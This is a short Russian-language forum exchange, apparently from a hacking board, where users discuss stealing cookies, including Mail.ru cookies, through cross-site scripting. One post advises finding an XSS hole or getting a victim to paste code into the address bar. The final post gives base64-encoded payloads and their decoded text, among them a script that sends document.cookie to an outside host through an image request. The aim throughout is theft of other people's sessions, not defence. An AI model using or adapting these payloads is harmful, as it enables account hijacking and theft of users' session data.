самое главное тебе надо найти xss

я мейловские куки глянул, они большие, да и видео когда смотрел там большие

точнее так можно)

а как по правильно? открой тайну)

в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)

Неважно с откуда они передаются, я о том это зависит от программиста который сам решает что ему писать в кукисы. Я уж незнаю есть ли там у тебя xss или нет если всеже нет то то заставь вставить твой код в адресную строку при открытой странице.

то есть сначало нужно найти xss, а потом отправлять) спс)

и все-таки не догоняю...

вот например такое проходит PHNjcmlwdD4NCmFsZXJ0KFhTUykNCjwvc2NyaXB0Pg== что равно <script>alert(XSS)</script>. а data:text/html;base64,PHNjcmlwdD4NCmltZyA9IG5ldyBJbWFnZSgpOy BpbWcuc3JjID0gImh0dHA6Ly9odHRwei5ydS9u
cGhpcjhseG0xeS5naWY/Iitkb2N1bWVudC5jb29raWU7DQo8L3NjcmlwdD4= что значит <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
не проходит( ведь если проходит "><script>alert()</script> значит уязвимость есть, следовательно и куки должны вороваться